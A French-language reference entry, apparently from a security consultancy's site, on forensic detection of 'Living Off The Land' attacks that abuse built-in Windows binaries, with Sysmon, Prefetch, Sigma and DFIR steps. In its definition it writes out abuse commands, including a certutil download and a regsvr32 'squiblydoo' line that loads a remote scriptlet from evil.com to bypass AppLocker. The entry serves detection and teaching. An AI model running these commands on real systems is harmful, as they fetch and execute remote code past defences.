Living Off The Land Forensics
forensicsDéfinition
Le Living Off The Land (LOtL ou LotL) est une stratégie d'attaque consistant à utiliser exclusivement des outils légitimes présents dans l'environnement cible (commandes Windows intégrées, scripts PowerShell, outils d'administration) pour accomplir les objectifs d'attaque, plutôt que d'introduire des outils malveillants détectables. La forensique LOtL consiste à identifier ces abus d'outils légitimes dans les artefacts d'investigation. Les binaires Windows nativement présents et fréquemment abusés (LOLBins — Living Off the Land Binaries) incluent : certutil.exe (téléchargement de fichiers : certutil -urlcache -f URL dest, encodage/décodage base64), mshta.exe (exécution de scripts HTML malveillants : mshta.exe javascript:...), regsvr32.exe (chargement de scripts COM distants via AppLocker bypass : regsvr32 /s /n /u /i:http://evil.com/scrobj.dll scrobj.dll, technique dite squiblydoo), wscript.exe et cscript.exe (exécution de VBScript/JScript malveillants), bitsadmin.exe (téléchargement de fichiers via BITS), rundll32.exe (exécution de DLLs : rundll32 shell32.dll,OpenAs_RunDLL), et powershell.exe avec ses nombreuses capacités offensives. La détection LOtL dans les Event Logs est rendue difficile par le fait que ces binaires ont des usages légitimes abondants. Les signatures de détection doivent se concentrer sur les anomalies : certutil utilisé en dehors du département IT, mshta.exe lancé par un processus non-navigateur, regsvr32 avec des arguments pointant vers des URLs, ou PowerShell avec des arguments encodés en Base64. Sysmon (EventID 1, Process Create) est la source principale pour la détection LOtL : il capture la ligne de commande complète de chaque processus, incluant les arguments suspects. Les Sigma rules pour les LOLBins (voir la base de règles sigma-rules.github.io) mappent les patterns LOtL connus vers des requêtes SIEM exploitables. La base de données LOLBas (Living Off The Land Binaries And Scripts, lolbas-project.github.io) documente exhaustivement tous les binaires Windows avec leurs techniques d'abus et des exemples de détection. Le Prefetch est aussi une source précieuse : les exécutions de certutil, mshta, wscript avec des timestamps proches d'un incident révèlent des abus LOtL même si les process logs ont été effacés.
Fonctionnement
LOtL exploite la confiance accordée aux binaires signum par Microsoft et présents par défaut dans Windows. Les mécanismes de défense (AppLocker, WDAC) permettent souvent ces binaires par défaut. Les proxies réseau autorisent les connexions initiées par mshta.exe ou certutil.exe comme du trafic légitime. L'absence de fichiers malveillants sur disque complique la détection par les antivirus basés sur les signatures de fichiers.
Application DFIR
Investigation LOtL : 1) Prefetch : PECmd → certutil.exe, mshta.exe, wscript.exe exécutés récemment ?, 2) Sysmon EventID 1 : commandes complètes avec arguments suspects (certutil -urlcache, mshta javascript:, regsvr32 /i:http), 3) Amcache/ShimCache : tracer l'exécution des LOLBins dans le temps, 4) PowerShell Script Block Logging (EventID 4104) : payloads encodés Base64, DownloadString, 5) DNS logs : résolutions depuis des processus LOtL vers des domaines externes suspects. Corréler avec les IOCs et la timeline d'incident.
Outils
LOLBas database (lolbas-project.github.io, exhaustif), LOLOL (Living Off the Land Operators' Lifecycle, mwrlabs). Détection Sigma : github.com/SigmaHQ/sigma (LOLBins rules), DeepBlueCLI (PowerShell + LOLBins detection). Forensique LOtL : ShimCache/AmCache (exécutions LOLBins), Sysmon + ELK stack, OSSEC (Linux LOTL detection). Training : SANS FOR508 (LOtL detection labs), MITRE ATT&CK sub-techniques T1059 (command and scripting interpreter).
Articles liés
Expert en cybersécurité offensive et intelligence artificielle. Pentest, audit et développement IA sur-mesure.
Services
- Audit Infrastructure
- Audit Kubernetes
- Audit Microsoft 365
- Audit Sécurité Réseau
- Analyse de Risques
- Audit Active Directory
- Audit Application Web
- Audit Cloud (AWS/Azure/GCP)
- Audit Messagerie
- Audit API (OWASP Top 10)
- Audit DevSecOps & CI/CD
- Audit Code Source (SAST)
- Audit Postes de Travail
- Audit Sauvegarde & Résilience
- Audit OT/SCADA (IEC 62443)
- Développement IA
- Formations
Ressources
Projets & Outils
© 2026 Ayi NEDJIMI Consultants. Tous droits réservés.
Un projet cybersécurité ?
Expert dispo · Réponse 24h